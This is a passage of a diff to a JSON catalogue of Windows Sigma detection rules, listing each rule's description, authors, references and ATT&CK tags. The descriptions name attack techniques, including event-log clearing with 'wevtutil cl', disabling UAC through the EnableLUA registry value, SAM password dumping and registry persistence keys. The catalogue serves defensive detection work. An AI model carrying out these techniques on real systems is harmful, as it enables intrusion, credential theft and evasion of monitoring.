"Legitimate use of SysInternals tools", + "Programs that use the same Registry Key" + ], + "filename": "registry_add_sysinternals_eula_accepted.yml", + "level": "low", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "25ffa65d-76d8-4da5-a832-3f2b0136e133", + "value": "Usage of Sysinternals Tools - Registry" + }, + { + "description": "Detects creation of UserInitMprLogonScript persistence method", + "meta": { + "author": "Tom Ueltschi (@c_APT_ure)", + "creation_date": "2019/01/12", + "falsepositive": [ + "Exclude legitimate logon scripts" + ], + "filename": "registry_add_logon_scripts_userinitmprlogonscript_reg.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md", + "https://attack.mitre.org/techniques/T1037/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_logon_scripts_userinitmprlogonscript_reg.yml" + ], + "tags": [ + "attack.t1037.001", + "attack.persistence", "attack.lateral_movement" ] }, - "uuid": "18f37338-b9bd-4117-a039-280c81f7a596", - "value": "Zerologon Exploitation Using Well-known Tools" + "uuid": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "value": "Logon Scripts Creation in UserInitMprLogonScript Registry" }, { - "description": "Detects powershell script installed as a Service", + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", "meta": { "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/06", + "creation_date": "2020/10/13", "falsepositive": [ "Unknown" ], - "filename": "win_system_powershell_script_installed_as_service.yml", + "filename": "registry_set_wab_dllpath_reg_change.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_powershell_script_installed_as_service.yml" + "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/", + "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", + "https://twitter.com/Hexacorn/status/991447379864932352", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml" ], "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1218" ] }, - "uuid": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "value": "PowerShell Scripts Installed as Services" + "uuid": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "value": "Execution DLL of Choice Using WAB.EXE" }, { - "description": "Detects QuarksPwDump clearing access history in hive", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", "meta": { - "author": "Florian Roth", - "creation_date": "2017/05/15", + "author": "Sittikorn S, frack113", + "creation_date": "2021/07/16", "falsepositive": [ - "Unknown" + "Unlikely" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml", + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml", "level": "critical", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml" + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" ], "tags": [ "attack.credential_access", - "attack.t1003.002" + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ] }, - "uuid": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "value": "QuarksPwDump Clearing Access History" + "uuid": "32b5db62-cb5f-4266-9639-0fa48376ac00", + "value": "CVE-2021-31979 CVE-2021-33771 Exploits" }, { - "description": "Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services", + "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/08", + "author": "frack113", + "creation_date": "2022/08/19", "falsepositive": [ - "Software installation", - "Software updates" + "Unknown" ], - "filename": "win_system_rare_service_installs.yml", - "level": "low", - "logsource.category": "No established category", + "filename": "registry_set_suppress_defender_notifications.yml", + "level": "medium", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rare_service_installs.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "value": "Activate Suppression of Windows Security Center Notifications" + }, + { + "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use of the dll." + ], + "filename": "registry_set_scrobj_dll_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scrobj_dll_persistence.yml" ], "tags": [ "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1546.015" ] }, - "uuid": "66bfef30-22a5-4fcd-ad44-8d81e60922ae", - "value": "Rare Service Installations" + "uuid": "fe20dda1-6f37-4379-bbe0-a98d400cae90", + "value": "Scrobj.dll COM Hijacking" }, { - "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", + "description": "Detects potential persistence using Appx DebugPath", "meta": { - "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", - "creation_date": "2019/05/24", - "falsepositive": [ - "Bad connections or network interruptions" - ], - "filename": "win_system_rdp_potential_cve_2019_0708.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/zerosum0x0/CVE-2019-0708", - "https://github.com/Ekultek/BlueKeep", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rdp_potential_cve_2019_0708.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ] - }, - "uuid": "aaa5b30d-f418-420b-83a0-299cb6024885", - "value": "Potential RDP Exploit CVE-2019-0708" - }, - { - "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/11", - "falsepositive": [ - "Legitimate usage of the anydesk tool" - ], - "filename": "win_system_service_install_anydesk.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_anydesk.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "530a6faa-ff3d-4022-b315-50828e77eef5", - "value": "Anydesk Remote Access Software Service Installation" - }, - { - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/21", + "author": "frack113", + "creation_date": "2022/07/27", "falsepositive": [ "Unknown" ], - "filename": "win_system_service_install_hacktools.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_hacktools.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "d26ce60c-2151-403c-9a42-49420d87b5e4", - "value": "Hacktool Service Registration or Execution" - }, - { - "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/28", - "falsepositive": [ - "Legitimate use of the tool" - ], - "filename": "win_system_service_install_mesh_agent.yml", + "filename": "registry_set_persistence_appx_debugger.yml", "level": "medium", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml" + "https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/", + "https://github.com/rootm0s/WinPwnage", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml" ], "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1546.015" ] }, - "uuid": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", - "value": "Mesh Agent Service Installation" + "uuid": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "value": "Windows Registry Persistence DebugPath" }, { - "description": "Detects NetSupport Manager service installation on the target system.", + "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/31", + "author": "Tobias Michalski", + "creation_date": "2022/02/24", "falsepositive": [ - "Legitimate use of the tool" + "Legitimate disabling of crashdumps" ], - "filename": "win_system_service_install_netsupport_manager.yml", + "filename": "registry_set_crashdump_disabled.yml", "level": "medium", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml" + "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml" ], "tags": [ - "attack.persistence" + "attack.t1564", + "attack.t1112" ] }, - "uuid": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", - "value": "NetSupport Manager Service Install" + "uuid": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "value": "CrashControl CrashDump Disabled" }, { - "description": "Detects PAExec service installation", + "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/26", + "author": "frack113", + "creation_date": "2022/01/05", "falsepositive": [ "Unknown" ], - "filename": "win_system_service_install_paexec.yml", + "filename": "registry_set_disable_uac_registry.yml", "level": "medium", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.poweradmin.com/paexec/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_paexec.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", - "value": "PAExec Service Installation" - }, - { - "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/22", - "falsepositive": [ - "Legitimate use of the tool" - ], - "filename": "win_system_service_install_pdqdeploy.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_uac_registry.yml" ], "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1548.002" ] }, - "uuid": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", - "value": "New PDQDeploy Service - Server Side" + "uuid": "48437c39-9e5f-47fb-af95-3d663c3f2919", + "value": "Disable UAC Using Registry" }, { - "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "description": "Detects the manipulation of persistent URLs which can be malicious", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/22", + "author": "Tobias Michalski", + "creation_date": "2021/06/09", "falsepositive": [ - "Legitimate use of the tool" + "Unknown" ], - "filename": "win_system_service_install_pdqdeploy_runner.yml", - "level": "medium", - "logsource.category": "No established category", + "filename": "registry_set_outlook_registry_webview.yml", + "level": "high", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml" + "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us", + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1112" + ] + }, + "uuid": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", + "value": "Persistent Outlook Landing Pages" + }, + { + "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", + "meta": { + "author": "frack113", + "creation_date": "2022/03/18", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "registry_set_set_nopolicies_user.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "1c3121ed-041b-4d97-a075-07f54f20fb4a", + "value": "Registry Explorer Policy Modification" + }, + { + "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", + "meta": { + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "creation_date": "2018/04/11", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_globalflags_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml" ], "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "attack.persistence", + "attack.defense_evasion", + "attack.t1546.012", + "car.2013-01-002" ] }, - "uuid": "b98a10af-1e1e-44a7-bab2-4cc026917648", - "value": "New PDQDeploy Service - Client Side" + "uuid": "36803969-5421-41ec-b92f-8500f79c23b0", + "value": "Potential GlobalFlags Registry Persistence Attempt" }, { - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/06/12", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_service_install_psexec.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_psexec.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "42c575ea-e41e-41f1-b248-8093c3e82a28", - "value": "PsExec Service Installation" - }, - { - "description": "Detects Remote Utilities Host service installation on the target system.", + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/31", - "falsepositive": [ - "Legitimate use of the tool" - ], - "filename": "win_system_service_install_remote_utilities.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.remoteutilities.com/support/kb/host-service-won-t-start/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", - "value": "Remote Utilities Host Service Install" - }, - { - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2022/08/25", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_service_install_sliver.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231", - "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_sliver.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" - ] - }, - "uuid": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", - "value": "Sliver C2 Default Service Installation" - }, - { - "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/05", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_service_install_susp_double_ampersand.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", - "value": "New Service Uses Double Ampersand in Path" - }, - { - "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/28", - "falsepositive": [ - "Legitimate use of the tool" - ], - "filename": "win_system_service_install_tacticalrmm.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "4bb79b62-ef12-4861-981d-2aab43fab642", - "value": "TacticalRMM Service Installation" - }, - { - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "meta": { - "author": "Dimitrios Slamaris", - "creation_date": "2017/05/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_susp_dhcp_config.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", - "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", - "value": "DHCP Server Loaded the CallOut DLL" - }, - { - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "meta": { - "author": "Dimitrios Slamaris, @atc_project (fix)", - "creation_date": "2017/05/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_susp_dhcp_config_failed.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", - "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config_failed.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "75edd3fd-7146-48e5-9848-3013d7f0282c", - "value": "DHCP Server Error Failed Loading the CallOut DLL" - }, - { - "description": "One of the Windows Core Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "meta": { - "author": "Florian Roth, Tim Shelton", - "creation_date": "2022/05/17", - "falsepositive": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" - ], - "filename": "win_system_susp_eventlog_cleared.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", - "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ] - }, - "uuid": "100ef69e-3327-481c-8e5c-6d80d9507556", - "value": "System Eventlog Cleared" - }, - { - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/05/27", + "creation_date": "2022/08/01", "falsepositive": [ "Unlikely" ], - "filename": "win_system_susp_proceshacker.yml", + "filename": "registry_set_policies_associations_tamper.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/1kwpeter/status/1397816101455765504", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_proceshacker.yml" + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml" ], "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion" ] }, - "uuid": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", - "value": "ProcessHacker Privilege Elevation" + "uuid": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "value": "Modify Attachment Manager Settings - Associations" }, { - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_susp_rtcore64_service_install.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", - "value": "RTCore Suspicious Service Installation" - }, - { - "description": "Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers", + "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", "meta": { "author": "Florian Roth", - "creation_date": "2018/01/27", + "creation_date": "2017/05/08", "falsepositive": [ "Unknown" ], - "filename": "win_system_susp_sam_dump.yml", + "filename": "registry_set_dns_serverlevelplugindll.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_sam_dump.yml" + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml" ], "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" ] }, - "uuid": "839dd1e8-eda8-4834-8145-01beeee33acd", - "value": "SAM Dump to AppData" + "uuid": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "value": "DNS ServerLevelPluginDll Install - Registry" }, { - "description": "Detects suspicious service installation commands", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { - "author": "pH-T", - "creation_date": "2022/03/18", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", "falsepositive": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "filename": "win_system_susp_service_installation.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" - ] - }, - "uuid": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", - "value": "Suspicious Service Installation" - }, - { - "description": "Detects service installation in suspicious folder appdata", - "meta": { - "author": "pH-T", - "creation_date": "2022/03/18", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_susp_service_installation_folder.yml", + "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml", "level": "medium", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml" + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" ], "tags": [ "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1547.001" ] }, - "uuid": "5e993621-67d4-488a-b9ae-b420d08b96cb", - "value": "Service Installation in Suspicious Folder" + "uuid": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "value": "CurrentVersion NT Autorun Keys Modification" }, { - "description": "Detects service installation with suspicious folder patterns", + "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", "meta": { - "author": "pH-T", - "creation_date": "2022/03/18", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "creation_date": "2022/09/29", "falsepositive": [ - "Unknown" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml", - "level": "high", - "logsource.category": "No established category", + "filename": "registry_set_terminal_server_suspicious.yml", + "level": "medium", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml" + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", + "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + 